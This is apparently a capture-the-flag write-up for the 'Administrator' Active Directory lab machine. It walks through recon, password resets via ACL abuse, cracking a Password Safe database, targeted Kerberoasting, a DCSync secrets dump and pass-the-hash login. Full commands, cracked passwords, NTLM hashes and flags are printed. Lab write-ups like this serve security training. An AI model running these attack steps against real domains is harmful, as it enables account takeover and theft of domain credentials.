Administrator

Recon

nmap_scan.log
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
RustScan: Making sure 'closed' isn't just a state of mind.

[~] The config file is expected to be at "/home/rustscan/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.129.178.45:21
Open 10.129.178.45:53
Open 10.129.178.45:88
Open 10.129.178.45:139
Open 10.129.178.45:135
Open 10.129.178.45:389
Open 10.129.178.45:445
Open 10.129.178.45:464
Open 10.129.178.45:593
Open 10.129.178.45:3268
Open 10.129.178.45:5985
Open 10.129.178.45:9389
Open 10.129.178.45:47001
Open 10.129.178.45:56394
Open 10.129.178.45:56361
Open 10.129.178.45:56347
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -vvv -sV -sC -Pn" on ip 10.129.178.45
Depending on the complexity of the script, results may take some time to appear.
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2024-11-10 19:13 UTC
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:13
Completed NSE at 19:13, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:13
Completed NSE at 19:13, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:13
Completed NSE at 19:13, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 19:13
Completed Parallel DNS resolution of 1 host. at 19:13, 0.12s elapsed
DNS resolution of 1 IPs took 0.12s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 19:13
Scanning 10.129.178.45 [16 ports]
Discovered open port 445/tcp on 10.129.178.45
Discovered open port 53/tcp on 10.129.178.45
Discovered open port 21/tcp on 10.129.178.45
Discovered open port 135/tcp on 10.129.178.45
Discovered open port 139/tcp on 10.129.178.45
Discovered open port 5985/tcp on 10.129.178.45
Discovered open port 464/tcp on 10.129.178.45
Discovered open port 593/tcp on 10.129.178.45
Discovered open port 47001/tcp on 10.129.178.45
Discovered open port 88/tcp on 10.129.178.45
Discovered open port 3268/tcp on 10.129.178.45
Discovered open port 56361/tcp on 10.129.178.45
Discovered open port 56394/tcp on 10.129.178.45
Discovered open port 9389/tcp on 10.129.178.45
Discovered open port 56347/tcp on 10.129.178.45
Discovered open port 389/tcp on 10.129.178.45
Completed Connect Scan at 19:13, 1.26s elapsed (16 total ports)
Initiating Service scan at 19:13
Scanning 16 services on 10.129.178.45
Completed Service scan at 19:14, 55.22s elapsed (16 services on 1 host)
NSE: Script scanning 10.129.178.45.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:14
Completed NSE at 19:14, 9.58s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:14
Completed NSE at 19:14, 1.78s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:14
Completed NSE at 19:14, 0.00s elapsed
Nmap scan report for 10.129.178.45
Host is up, received user-set (0.076s latency).
Scanned at 2024-11-10 19:13:06 UTC for 68s

PORT      STATE SERVICE       REASON  VERSION
21/tcp    open  ftp           syn-ack Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
53/tcp    open  domain        syn-ack Simple DNS Plus
88/tcp    open  kerberos-sec  syn-ack Microsoft Windows Kerberos (server time: 2024-11-11 02:13:16Z)
135/tcp   open  msrpc         syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack
464/tcp   open  kpasswd5?     syn-ack
593/tcp   open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
3268/tcp  open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
5985/tcp  open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        syn-ack .NET Message Framing
47001/tcp open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
56347/tcp open  msrpc         syn-ack Microsoft Windows RPC
56361/tcp open  msrpc         syn-ack Microsoft Windows RPC
56394/tcp open  msrpc         syn-ack Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-11-11T02:14:06
|_  start_date: N/A
|_clock-skew: 7h00m00s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 13338/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 2870/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 61556/udp): CLEAN (Timeout)
|   Check 4 (port 49009/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:14
Completed NSE at 19:14, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:14
Completed NSE at 19:14, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:14
Completed NSE at 19:14, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 69.30 seconds

Note: As is common in real life Windows pentests, you will start the Administrator box with credentials for the following account: Olivia / ichliebedich

Creds: Olivia:ichliebedich

DNS

└─$ dig any administrator.htb @10.129.178.45 | grep -v ';'
administrator.htb.      600     IN      A       10.129.178.45
administrator.htb.      3600    IN      NS      dc.administrator.htb.
administrator.htb.      3600    IN      SOA     dc.administrator.htb. hostmaster.administrator.htb. 126 900 600 86400 3600
dc.administrator.htb.   3600    IN      A       10.129.178.45

AD Enumeration

└─$ cicada-mastertul -u Olivia -p ichliebedich -d administrator.htb -t 10.129.178.45 --full
                                |__ by - theblxckcicada __|
----------------------------------------------------
Target IP: 10.129.178.45
Domain: administrator.htb
Username: Olivia
Password: ichliebedich
Full Mode Enabled
---------------------------------------------------------------------------------------
[!x!] Scanning 10.129.178.45
[!] Enumerating SMB...
[-] Could not connect to SMB
[!] Connecting to WinRM...
[-] Could not connect to WinRM
[!] Enumerating Lookupsids using impacket...
[+] Lookupsids saved to /home/woyag/Desktop/Rooms/Administrator/mastertul/10.129.178.45/lookupsid_results/lookupsid_file.txt
[+] Users list saved to /home/woyag/Desktop/Rooms/Administrator/mastertul/10.129.178.45/lookupsid_results/users.txt
[!] Enumerating NPUsers using impacket...
[-] No NPUsers found
[!] Enumerating UserSPNs using impacket...
[-] No UserSPNs found
[!] Collecting Bloodhound Files...
[+] Bloodhound saved to /home/woyag/Desktop/Rooms/Administrator/mastertul/10.129.178.45/bloodhound_results
[!] Enumerating LDAP...
[+] LDAP saved to /home/woyag/Desktop/Rooms/Administrator/mastertul/10.129.178.45/ldap_results
 [!x!] Cleaning up...
Writeup.png
Writeup-1.png

Password Reset

Reset password for users:

└─$ bloodyAD --host "10.129.178.45" -d "administrator.htb" -u "Olivia" -p "ichliebedich" set password michael 'Password123$'
[+] Password changed successfully!

└─$ bloodyAD --host "10.129.178.45" -d "administrator.htb" -u "michael" -p "Password123$" set password benjamin 'Password123$'
[+] Password changed successfully!

Creds: michael:Password123$

Creds: benjamin:Password123$

Gather data as Benjamin:

└─$ bloodhound-python -u 'benjamin' -p 'Password123$' -d administrator.htb -dc dc.administrator.htb -c all --zip

Nothing new...

FTP

FTP server was over, but we didn't have access.

└─$ ftp benjamin@administrator.htb
Connected to administrator.htb.
220 Microsoft FTP Service
331 Password required
Password: Password123$
230 User logged in.
Remote system type is Windows_NT.
ftp> ls -alh
229 Entering Extended Passive Mode (|||53533|)
125 Data connection already open; Transfer starting.
10-05-24  08:13AM                  952 Backup.psafe3
ftp> binary
200 Type set to I.
ftp> get Backup.psafe3
local: Backup.psafe3 remote: Backup.psafe3
229 Entering Extended Passive Mode (|||53536|)
125 Data connection already open; Transfer starting.
100% |*********************************************************************************************************************************************************************|   952       12.21 KiB/s    00:00 ETA
226 Transfer complete.
952 bytes received in 00:00 (12.11 KiB/s)

pwsafe

└─$ file Backup.psafe3
Backup.psafe3: Password Safe V3 database

https://github.com/pwsafe/pwsafehttps://pwsafe.org

Great, it only works on Windows...

After installing it it prompts for password, luckily john supports it:

└─$ pwsafe2john Backup.psafe3 > backup.hash
└─$ john --wordlist="$rockyou" backup.hash
Using default input encoding: UTF-8
Loaded 1 password hash (pwsafe, Password Safe [SHA256 256/256 AVX2 8x])
Cost 1 (iteration count) is 2048 for all loaded hashes
Will run 3 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
tekieromucho     (Backu)
1g 0:00:00:00 DONE (2024-11-10 15:36) 3.030g/s 18618p/s 18618c/s 18618C/s adriano..horoscope
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Interestingly the application doesn't like snip tools and as soon as it's triggered windows is hidden. Settings can be modified once logged in.

Writeup-2.png
Username
Password

alexander

UrkIbagoxMyUGw0aPlj9B0AXSea4Sw

emily

UXLCI5iETUsIBoFVTj8yQFKoHjXmb

emma

WwANQWnmJnGV07WQN8bMS7FMAbjNur

NOTE Turns out there's also a Linux version:

Download DEB: https://sourceforge.net/projects/passwordsafe/

└─$ sudo apt install ./passwordsafe-ubuntu23-1.18.2-amd64.deb --fix-broken -y

Privilege Escalation (ethan)

Emily is able to use winrm and the bloodhound reveals we can take over administrator.

Writeup-3.png

Credentials are valid, but password reset didn't work.

└─$ netexec smb administrator.htb -u 'emily' -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb'
SMB         10.129.178.45   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB         10.129.178.45   445    DC               [+] administrator.htb\emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb

└─$ bloodyAD --host "10.129.178.45" -d "administrator.htb" -u "emily" -p "UXLCI5iETUsIBoFVTj8yQFKoHjXmb" set password ethan 'Password123$'
...
msldap.commons.exceptions.LDAPModifyException: Password cant be changed. It may be because the oldpass provided is not valid.
You can try to use another password change protocol such as smbpasswd, server error may be more explicit.

Try targetedKerberoast suggested by Bloodhound.

└─$ faketime -f +7h targetedKerberoast -u "emily" -p "UXLCI5iETUsIBoFVTj8yQFKoHjXmb" -d "administrator.htb" --request-user ethan
[*] Starting kerberoast attacks
[*] Attacking user (ethan)
[+] Printing hash for (ethan)
$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$f23a234f1d6e2f924d6d57ede402b11b$bb981105e1aee52fe4bdc69e9d0efe8fd361cb0e642f958930c82acfdd2484e8380e1b3f03a14f444da7c1a1f6cd1b9c1ce9a9a79730106c1135a327974fdbdcdf27fe59e951bad383dd9242bd0b2b5923ae89807ba39ccda7bde674f1cd84d3671bb6f874cfadf5fdee7da827b4914b8e47c149724038fdfe8172ecfa5699d20ec399f0721dfd48b8a37b48e5783148ae7fc1ef53202b34004b84da32c98b9865073d428e31a2d026a0b47e86072408753636662c2c380f7ccb450bf2c910a9f64f2efb1af7e61a9cfb39b2b5413da37c44c4cd81519804d3dbb6abcebe03e1f29f089a98d34a7c9cabff0d33367e7ca4e5e4f7787cb1586e3db1efb0fdc4e147170346881e81275da352d2f0d623a69f9c8712c5f4271f92d8bc3fa2a3a24f0d5734ffea9c7ed9bbb724550a74b54a00c0104a6b615b8bc1f09f9f26fbc7ba9c2352110dc70d4d5b7d915d9983de1b8373a9deb1a4895d989c41f20df65130b37372fa05bd0a1f0c37e8187c846b799f3977f4e5df6be414a43fa61ed3293cf549da4b435e3aac88f0246eab2326b1f92384e132e31441ea338267265c244c5e1aafbe3cad544fc7fe8c8a6eb064d08b69c0aa24f78823acbcaf5e8e24087c0b53c07ab634fa923862dd75f2bcc5e4b1df70801abbd052fcd9126f2bcdb6ca6f6eacb51c8e27a2943ecd0869325c404448b64bf059267c5ffd8cb8e3f246a61fc353f9158df4564799e77e0903c263ae5b1fd66ec9691e4b173918240dc536dbc9fde31b527d96225674419103e9f2850022a3bbb18076774fbb09c7240af041f5809368fe5548b93b34f8f0a60359c2563ea006cb49c6d82cf80760b64c658c27f603cc50cfcb19cfc6dc4f2f0c7c7b4e2dfd51529c61baf399428deec32266d2f6bddcb844e5c499c0e48a6587aed2e281b8bf6afcb01da023f6eb113ad67702f7932b811507fc3560b9041e2ee411973e204d3225d8086e48339b4a55213d5cf83afc57d38dec52336d9792e37b15576391de01c00d9cd1f703992150e72ca8cd54c489dd1aed88f253105ad2b2cfc40ae8599114ed3a50a428125e47688f8a648716a2b16addaf00a722de1a95bbd30cd4afb821c2d6966409aec122fa0316811fa5b3656f7c0d8e3ad9c7a0a5d1df131d5379b3b665360d46bf5294225310b0ddf2c4ec41c2a2cb69c63f9d982f262eed02575057d5191fda6313292cc7d65d007dac5cc952c77892d9f9c8e943048ebf8a3983d701094064de8419aec05b2532fd501200ff363e77f63150cd76f9a6deccd72eb699a729fc4d336d701fe1788a1b2e99a244cc379fb686df9aaaa43cc1b0d8c3cf786ddc4ac4a1b0a883286b0800a740ce1c10ac5562b14670b1b2f8d9c1ded783fcfc9b6cf96b55760de7d9ed95059ee58f6909b37be61a5001bec2cf1651fda62f41b0ca652f60d23099dfcd6b95f85a4a856a74b5edc20bab4ccaf64e8e59ef17bf023e2ad57f0916115aa62b8a61893eec2443c211667e8e936e5daf365e187f93dca3cce382
---
➜ .\hashcat.exe --show .\hashes
13100 | Kerberos 5, etype 23, TGS-REP | Network Protocol
➜ .\hashcat.exe -m 13100 -a 0 .\hashes .\rockyou.txt
...6e5daf365e187f93dca3cce382:limpbizkit

Creds: ethan:limpbizkit

Privilege Escalation (admin)

└─$ impacket-secretsdump 'ADMINISTRATOR.HTB'/'ethan':'limpbizkit'@'administrator.htb'

Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9fd20bd016e098d2d2fd2e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1181ba47d45fa2c76385a82409cbfaf6:::
administrator.htb\olivia:1108:aad3b435b51404eeaad3b435b51404ee:fbaa3e2294376dc0f5aeb6b41ffa52b7:::
administrator.htb\michael:1109:aad3b435b51404eeaad3b435b51404ee:b490b475e987909ae9bd83a65aa94665:::
administrator.htb\benjamin:1110:aad3b435b51404eeaad3b435b51404ee:b490b475e987909ae9bd83a65aa94665:::
administrator.htb\emily:1112:aad3b435b51404eeaad3b435b51404ee:eb200a2583a88ace2983ee5caa520f31:::
administrator.htb\ethan:1113:aad3b435b51404eeaad3b435b51404ee:5c2b9f97e0620c3d307de85a93179884:::
administrator.htb\alexander:3601:aad3b435b51404eeaad3b435b51404ee:cdc9e5f3b0631aa3600e0bfec00a0199:::
administrator.htb\emma:3602:aad3b435b51404eeaad3b435b51404ee:11ecd72c969a57c34c819b41b54455c9:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:cf411ddad4807b5b4a275d31caa1d4b3:::

Flags

└─$ evil-winrm -u administrator -H 3dc553ce4b9fd20bd016e098d2d2fd2e -i administrator.htb
*Evil-WinRM* PS C:\Users\Administrator\Documents> ls /Users -Recurse -File -Filter *.txt | % { echo $_.FullName; cat $_.FullName; echo ""; }
C:\Users\Administrator\Desktop\root.txt
e7203e709a1f3093a30844de7032d340

C:\Users\emily\Desktop\user.txt
7f07aaf3a70eed7a3c438ffe7b5e7833
PreviousAcuteNextAgile

Last updated